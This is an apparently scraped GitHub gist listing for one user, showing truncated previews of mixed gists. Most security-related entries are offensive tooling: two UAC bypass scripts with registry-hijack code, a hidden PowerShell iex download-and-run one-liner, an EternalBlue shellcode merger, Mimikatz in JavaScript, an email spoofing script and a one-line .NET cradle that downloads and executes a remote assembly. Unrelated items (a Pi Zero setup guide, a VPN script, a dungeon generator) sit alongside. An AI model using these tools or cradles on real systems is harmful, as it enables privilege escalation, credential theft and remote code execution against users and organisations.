Random1984

  • Palookaville
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@Random1984
Random1984 / HowToOTGFast.md
Created August 16, 2016 12:21 — forked from gbaman/HowToOTGFast.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!

### Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)
More details - http://blog.gbaman.info/?p=791

For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc.) and add `dtoverlay=dwc2` on a new line at the bottom of the `config.txt` file, then save the file.
3. Finally, open up the `cmdline.txt`. Be careful with this file, it is very picky with its formatting! Each parameter is separated by a single

@Random1984
Random1984 / katz.js
Created May 3, 2017 09:28
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
@Random1984
Random1984 / eternalblue_merge_shellcode.py
Created July 5, 2017 10:46 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@Random1984
Random1984 / FilelessII.ps1
Last active July 26, 2017 17:33
sdctl.exe UAC bypass
# UAC Fileless II Bypass - Spawns Admin cmd.exe using sdctl runas method - Runs fine in Win10 x64
# powershell.exe -W hidden -C iex (new-object net.webclient).downloadstring('https://gist.githubusercontent.com/Random1984/07638e5ae464d30aa011c0ffd3bbfa59/raw/b3dff9ea72c3594482fa93391c538e204d6a575d/FilelessII.ps1')"
$reg = "HKCU:\Software\Classes\exefile\shell\runas\command"
$nam = "IsolatedCommand"
# Check if $reg doesn't exist to create it
IF(!(Test-Path $reg)) {
New-Item -Path $reg -Force | Out-Null
@Random1984
Random1984 / rules.ini
Created September 23, 2017 10:30
stegbreak 'rules.ini' file
#
# This file is part of John the Ripper password cracker,
# Copyright (c) 1996-98 by Solar Designer
#
# Wordlist mode rules
[List.Rules:Wordlist]
# Try words as they are
:
# Lowercase every pure alphanumeric word
-c >3!?XlQ
@Random1984
Random1984 / email-spoofing.php
Created October 9, 2017 01:28 — forked from xpressyoo/email-spoofing.php
Email Spoofing Example (Educational Purposes only)
<?
/*
Email Spoofing script (PHP). For Educational Purposes only.
To note that capabilities of the script have been intentionally limited.
This work is licensed under a MIT License. Copyright 2012 Florian Bersier
*/
// Get posted data into local variables
$EmailFrom = Trim(stripslashes($_POST['EmailFrom'])); // Your email, e.g. [email protected]
@Random1984
Random1984 / README.md
Created January 3, 2018 20:18 — forked from Lazza/README.md
VPNGate Python script

vpngate.py

This script makes it easy to use the free VPN service provided by VPNGate. The user just needs to provide the desired output country, and the script automatically chooses the best server.

After this step, OpenVPN is launched with the proper configuration. The VPN can be terminated by pressing Ctrl+C.

Usage

Run the script by providing the desired output country:

@Random1984
Random1984 / DotnetAssemblyDownloadCradle.cs
Created June 21, 2018 16:05 — forked from cobbr/DotnetAssemblyDownloadCradle.cs
A download cradle for .NET assemblies.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@Random1984
Random1984 / generate.c
Created March 5, 2019 12:01 — forked from munificent/generate.c
A random dungeon generator that fits on a business card
#include <time.h> // Robert Nystrom
#include <stdio.h> // @munificentbob
#include <stdlib.h> // for Ginny
#define r return // 2008-2019
#define l(a, b, c, d) for (i y=a;y\
<b; y++) for (int x = c; x < d; x++)
typedef int i;const i H=40;const i W
=80;i m[40][80];i g(i x){r rand()%x;
}void cave(i s){i w=g(10)+5;i h=g(6)
+3;i t=g(W-w-2)+1;i u=g(H-h-2)+1;l(u